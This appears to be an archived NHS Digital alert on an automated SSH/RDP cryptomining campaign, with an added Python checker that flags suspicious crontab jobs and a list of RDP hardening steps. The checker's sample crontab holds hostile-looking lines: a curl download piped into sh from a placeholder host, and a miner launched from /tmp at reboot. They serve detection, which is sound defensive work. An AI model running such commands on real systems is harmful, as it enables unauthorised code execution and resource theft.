
SSH RDP Cryptomining Campaign


This content has been archived

This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of the information contained in this page is at your own risk.

Summary

Security researchers have detected an automated campaign to install cryptocurrency mining malware on Internet-facing servers and other devices.

Affected platforms

The following platforms are known to be affected:

Threat details

An Internet bot has been scanning for devices with open ports relating to Secure Shell (SSH), Remote Desktop Protocol (RDP) and Internet of Things services. It then attempts to exploit these to download and execute a script.

The script checks for Internet connectivity and determines which Linux distribution is in use. It then configures huge pages and memlock to improve mining throughput. It downloads and runs the cryptocurrency miner, and finally adds a new entry to the device's crontab so that the miner continues to be run automatically.
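As an added defensive example that is not part of the original alert, the following Python checker scans crontab text for the persistence pattern described above: a job that downloads and pipes a script into a shell, a binary run from a world-writable directory, or a job that tunes huge pages or memlock. The sample crontab, its hostnames and paths are constructed for illustration.

```python
import re

# Indicators of the crontab persistence described in the alert, from the
# defender's side: download-and-execute jobs, binaries in world-writable
# directories, and huge page / memlock tuning scheduled at boot or on a timer.
PATTERNS = {
    "download-and-execute": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "runs-from-tmp": re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/"),
    "hugepage-or-memlock-tuning": re.compile(r"vm\.nr_hugepages|ulimit\s+-l|memlock"),
}

# A cron job line starts with either an @reboot-style keyword or five time fields.
CRON_PREFIX = re.compile(r"^(@\w+|(\S+\s+){5})")

# Constructed sample crontab (not an indicator from the alert).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# legitimate housekeeping job
0 2 * * * /usr/bin/apt-get update
*/5 * * * * curl -fsSL http://example.invalid/x.sh | sh
@reboot /tmp/.x/miner -o pool.example.invalid:3333
30 1 * * * sysctl -w vm.nr_hugepages=128
"""


def parse_crontab(text):
    """Yield (schedule, command) for each job line; skip comments and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_PREFIX.match(line)
        if not m:
            continue
        yield m.group(0).strip(), line[m.end():].strip()


def flag_suspicious(text):
    """Return [(command, [matched indicator names])] for jobs matching any pattern."""
    findings = []
    for _schedule, command in parse_crontab(text):
        reasons = [name for name, rx in PATTERNS.items() if rx.search(command)]
        if reasons:
            findings.append((command, reasons))
    return findings


if __name__ == "__main__":
    for command, reasons in flag_suspicious(SAMPLE_CRONTAB):
        print(f"{', '.join(reasons)}: {command}")
```

Pointing the checker at /etc/crontab, /etc/cron.d/* and each user's crontab output gives a quick triage of the persistence step; a hit is a lead to investigate, not proof of compromise.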
Remediation steps


If Remote Desktop Protocol (RDP) is not used, then ensure port 3389 (TCP/UDP) is blocked at your internet firewall. If RDP is used, then:

  • Only allow access for authorised RDP users.
  • Enforce strong password policies.
  • Enforce multi-factor authentication.
  • Don't allow RDP access for privileged user accounts.
  • Don't use generic accounts.
  • Set user accounts with an expiry date.
  • Audit user accounts periodically.
  • Only allow point-to-point connections from specific IP addresses where feasible.
  • Ensure Transport Layer Security (TLS) is up-to-date.
  • Log and monitor all RDP activity and investigate unusual behaviour.
  • Consider only allowing RDP for authorised virtual private network (VPN) connections.

Last edited: 17 February 2020 12:55 pm